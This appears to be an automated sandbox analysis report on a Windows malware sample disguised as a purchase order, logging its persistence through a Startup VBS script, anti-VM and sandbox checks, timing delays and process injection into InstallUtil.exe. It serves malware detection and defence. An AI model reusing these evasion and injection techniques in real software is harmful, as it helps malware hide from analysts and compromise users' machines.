                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06606B50 push 1C065EB3h; iretd 0_2_06606BA5
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06608B10 push esp; retf 0_2_06608D59
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066AB636 pushfd ; retn 0000h0_2_066AB63B
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066AAB65 push edi; iretd 0_2_066AAB66
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A2C9D push 00000006h; iretd 0_2_066A2CC0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A2C96 push 00000006h; retf 0_2_066A2C98
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A2D01 push 00000006h; ret 0_2_066A2D1C
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A2D81 push 00000006h; iretd 0_2_066A2D94
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C5EEB push es; iretd 0_2_067C5EEC
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C2ABB pushad ; retf 0_2_067C2AC1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067C61A6 push ds; iretd 0_2_067C61A7
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_067DCF7B push es; iretd 0_2_067DCF7C
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_016626C0 push esp; ret 5_2_016626C9
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06090A00 push es; retf 5_2_06090A08
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C70905 push esp; ret 5_2_06C7090D
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06C91913 push eax; ret 5_2_06C9191D
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD95AB push eax; iretd 5_2_06CD95B1
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD1281 push esp; retf 5_2_06CD1282
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD1277 push esp; retf 5_2_06CD127A
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD1233 push esp; retf 5_2_06CD123A
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD333B push es; ret 5_2_06CD3340
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD8C10 push esp; retf 5_2_06CD8D59
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD0DE1 push ebx; retf 5_2_06CD0DE2
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 5_2_06CD6B9B push 1C06CBB3h; iretd 5_2_06CD6BA5
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

                  Boot Survival

                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to dropped file
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbsJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: PO-12202432_ACD_Group.pif.exe PID: 3668, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: IsNestedFamANDAssem.exe PID: 2300, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: 2950000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory allocated: 1620000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeWindow / User API: threadDelayed 1531Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeWindow / User API: threadDelayed 3822Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2848Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6896Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeWindow / User API: threadDelayed 1209Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeWindow / User API: threadDelayed 3107Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 7164Thread sleep count: 1531 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 7164Thread sleep count: 3822 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99778s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98695s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98481s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98371s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98038s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97810s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97704s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97579s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97454s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97329s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4084Thread sleep count: 35 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4084Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2888Thread sleep count: 2848 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2888Thread sleep count: 6896 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 3228Thread sleep count: 1209 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 3228Thread sleep count: 3107 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99547s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99328s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99219s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99107s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98992s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98890s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98776s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98647s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98519s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98391s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98281s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -97938s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -97828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3872Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99891Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99778Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99672Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99563Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99438Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99313Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99203Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99094Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98969Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98860Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98695Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98594Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98481Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98371Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98264Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98156Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98038Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97922Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97810Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97704Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97579Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97454Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97329Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99766Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99547Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99219Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99107Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98992Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98890Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98776Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98647Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98519Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98391Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98281Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98172Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98063Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 97938Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 97828Jump to behavior
                  Source: InstallUtil.exe, 00000002.00000002.4475159585.0000000005381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBLMEM
                  Source: IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2163407938.0000000006430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: HgfS5paYPq
                  Source: InstallUtil.exe, 00000002.00000002.4475159585.0000000005381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2147980607.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2163407938.0000000006430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: GD7YGf2sqemUAekHdy6
                  Source: InstallUtil.exe, 00000002.00000002.4465370067.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2367145318.000000000141E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 76EFA6F0Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6FA008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 76EFA6F0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: CA5008Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002D9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]q$
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002E11000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTe]q\5
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Managerh{]qT
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager*
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002D2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.0000000002D77000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTe]q
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002D04000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTe]qtr
Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe | Queries volume information: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe VolumeInformation
Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe | Queries volume information: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe VolumeInformation
